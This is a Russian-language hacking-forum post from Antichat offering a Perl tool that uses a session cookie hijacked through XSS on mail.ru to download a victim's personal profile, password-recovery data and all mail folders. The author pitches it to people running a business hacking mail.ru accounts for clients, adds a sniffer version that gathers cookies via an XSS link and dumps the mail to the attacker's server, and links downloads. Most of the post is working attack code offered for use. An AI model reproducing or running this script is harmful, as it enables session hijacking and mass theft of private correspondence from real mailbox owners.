Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
[new mail.ru dumper] by slider |
23.07.2009, 18:34
|
|
Members of Antichat - Level 5
Регистрация: 04.09.2005
Сообщений: 528
Провел на форуме:
6520559
Репутация:
2947
|
|
[new mail.ru dumper] by slider
Ребят ... а можно я старое описание оставлю .. а ?! =\
Ибо правда заеп... скажу только что код уменьшил в три раза, улучил функционал, исправил багесы, старая версия кстать загнулась ... вобщем прошу любить и жаловать
[N3w t00lz by mE]
Наверняка каждому из вас приходилось или приходиться иметь дело с XSS на mail.ru т.к в данный момент это самая актуальная бага на выше упомянутом сервере ....
как нам уже известно сессия не живёт вечно и желательно за небольшой промежуток времени собрать максимально большое количество информации...
Думаю именно в тут вам и поможет эта тулза... в ее задачи как раз и входить ..
- слить анкетные данные, персональную информацию, контактную информацию, данные для восстановления пароля
- слить письма с таких директорий, как:
- Входящие
- Сомнительные
- Отправленные
- Корзина
Кому сможет пригодиться этот скрипт?!
ИМХО всем .. от мала до велика....
пригодится тем у кого "напряг" со временем...
пригодится ленивым ... кому лень рыться на ящике и сливать в ручную...
пригодится незнающим .. те у кого проблема с тем что бы поменять кукисы...
пригодится тем кто делает бизнесс на хеке майл.ру ... например .. фейк не сработал ... а сессию вы получили ... не отдадите же вы заказчику окуратно записаные кукисы?!... заказчик наверняка кроме как распечатать и повешать их на стенку ничего не придумает 
P.S: Если нуна .. то можно сделать версию а-ля сниффер ... будет собирать кукису и аккуратненько дамрить всё на сервере.....
PHP код:
#!/usr/bin/perl
## Сoded by [slider]
## http://forum.antichat.ru
## hello 2 my friends: brain[pillow], genom-- , cy4_, ... and .. and .. m0nzt3r - loleg :-P
use IO::Socket;
$cookies = q(ТУТ БУДЕТ КУКИСА);
print '-' x 56 . "\n [i] Coded by slider \n [i] forum.antichat.ru\n" . '-' x 56 . "\n\n";
information();create_dir();private();inbox();outbox();doubtful();trash();
sub requester{
$rqst = IO::Socket::INET->new(PeerAddr=>'win.mail.ru', PeerPort=>'80', Proto=>'tcp', Timeout=>'30') || print "Error! $!\n";
if($_[2] == 1){print $rqst "GET /cgi-bin/msglist?folder=$_[0]&page=9999999999999999 HTTP/1.0\r\nHost: win.mail.ru\r\nCookie: ".$cookies.";\r\n\r\n";
while($answer = <$rqst>){if ($answer =~ /$_[1]/){return $1}}}
if($_[2] == 2){print $rqst "GET $_[0] HTTP/1.0\r\nHost: win.mail.ru\r\nCookie: ".$cookies.";\r\n\r\n";
open (mailbox, $_[1]);while($answer = <$rqst>){print mailbox $answer;}}
if($_[2] == 3){
print $rqst "GET $_[0]$p HTTP/1.0\r\nHost: win.mail.ru\r\nCookie: ".$cookies.";\r\n\r\n";
while($answer = <$rqst>){
if ($answer =~ /td class=lettem><a href="readmsg\?id=(.*)"/){
print " [~] MID: $1 && PAGE: $p \n";
open (mailbox, ">./mailbox/$email/$_[1]/$p.$1.html");
$connect = IO::Socket::INET->new(PeerAddr=>'win.mail.ru', PeerPort=>'80', Proto=>'tcp', Timeout=>'30') || print "Error! $!\n";
print $connect "GET /cgi-bin/sentmsg?reply&id=$1 HTTP/1.0\r\nHost: win.mail.ru\r\nCookie: ".$cookies.";\r\n\r\n";
while($answer = <$connect>)
{print mailbox $answer;}}}}
}
sub create_dir{
if ( ! -e "mailbox" ){mkdir "mailbox", 0755 or die "[~] Can't create mailbox: $!\n";}
if ( ! -e "mailbox/$email" ){mkdir "mailbox/$email", 0755 or die "[~] Can't create mailbox/$email: $!\n";}
if ( ! -e "mailbox/$email/inbox" ){mkdir "mailbox/$email/inbox", 0755 or die "[~] Can't create mailbox/$email/inbox: $!\n";}
if ( ! -e "mailbox/$email/outbox" ){mkdir "mailbox/$email/outbox", 0755 or die "[~] Can't create $email/outbox: $!\n";}
if ( ! -e "mailbox/$email/doubtful" ){mkdir "mailbox/$email/doubtful", 0755 or die "[~] Can't create $email/doubtful: $!\n";}
if ( ! -e "mailbox/$email/trash" ){mkdir "mailbox/$email/trash", 0755 or die "[~] Can't create $email/trash: $!\n";}
if ( ! -e "mailbox/$email/private" ){mkdir "mailbox/$email/private", 0755 or die "[~] Can't create $email/private: $!\n";}
print "[!] Creating directory: ok\n";$o = '['.'-'x 5;
}
sub information{
$reg_last_p = '<b class=odin>· (.*) ·<\/b';
print "[!] Get information:\n\n";$o = '['.'-'x5;
$email=requester(0,'<nobr>(.*)<\/nobr><\/td><form action=logout>',1);if(!$email){$email='!!WRONG!!';die("Something wrong: e-mail\n")}
print "[- E-mail: $email\n[\n";
$ilp=requester(0,$reg_last_p,1);if(!$ilp){$ilp=1;}print $o." Inbox (last_page): $ilp\n";
$somn=requester(950,$reg_last_p,1);if(!$somn){$somn=1;}print $o." Doubtful (last_page): $somn\n";
$outbox=requester(500000,$reg_last_p,1);if(!$outbox){$outbox=1;}print $o." Outbox (last_page): $outbox\n";
$trash=requester(500002,$reg_last_p,1);if(!$trash){$trash=1;}print $o." Trash (last_page): $trash\n\n";
}
sub private{
print "[*] Getting private information: ";
requester('/cgi-bin/userinfo',">./mailbox/$email/private/userinfo_1.html",2);
requester('/cgi-bin/anketa?page=1',">./mailbox/$email/private/anketa_1.html",2);
requester('/cgi-bin/anketa?page=2',">./mailbox/$email/private/anketa_2.html",2);
requester('/cgi-bin/userinfo?mra=1',">./mailbox/$email/private/userinfo_2.html",2);
requester('/cgi-bin/start',">./mailbox/$email/private/index.html",2);
print "ok\n\n"
}
sub inbox{
print "[!] Geting: INBOX:\n\n";
for($p=1;$p<$ilp+1;$p++){
requester("/cgi-bin/msglist?folder=0&page=",'inbox',3);
print " [~] ok \n";}
}
sub outbox{
print "\n[!] Geting: OUTBOX:\n\n";
for($p=1;$p<$outbox+1;$p++){
requester("/cgi-bin/msglist?folder=500000&page=",'outbox',3);
print " [~] ok \n";}
}
sub doubtful{
print "\n[!] Geting: DOUBTFUL:\n\n";
for($p=1;$p<$somn+1;$p++){
requester("/cgi-bin/msglist?folder=950&page=",'doubtful',3);
print " [~] ok \n";}
}
sub trash{
print "\n[!] Geting: TRASH:\n\n";
for($p=1;$p<$trash+1;$p++){
requester("/cgi-bin/msglist?folder=500002&page=",'TRASH',3);
print " [~] ok \n";}
}
## Active Perl:
## http://downloads.activestate.com/ActivePerl/Windows/5.8/ActivePerl-5.8.8.820-MSWin32-x86-274739.msi
## Antichat.ru
Download here:http://webfile.ru/3794238
------------------------------------------------------------------------------------------------------
Долгожданная версия дампера под сниффер
- такс... а как юзать!?..
Да элементарно.. при юзании ксс подставляем ссылку на этот скрипт
- ещё что то!?..
ну да... подправьте положение перловы в первой строке: #!"C:\perl\bin\perl.exe" на ваш путь..
ммм... а так же установите нужные права... + убедитесь что в папке со скриптом стоят права на запись =)
Download here:http://webfile.ru/3815167
Последний раз редактировалось slider; 03.08.2009 в 16:36..
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Древовидный вид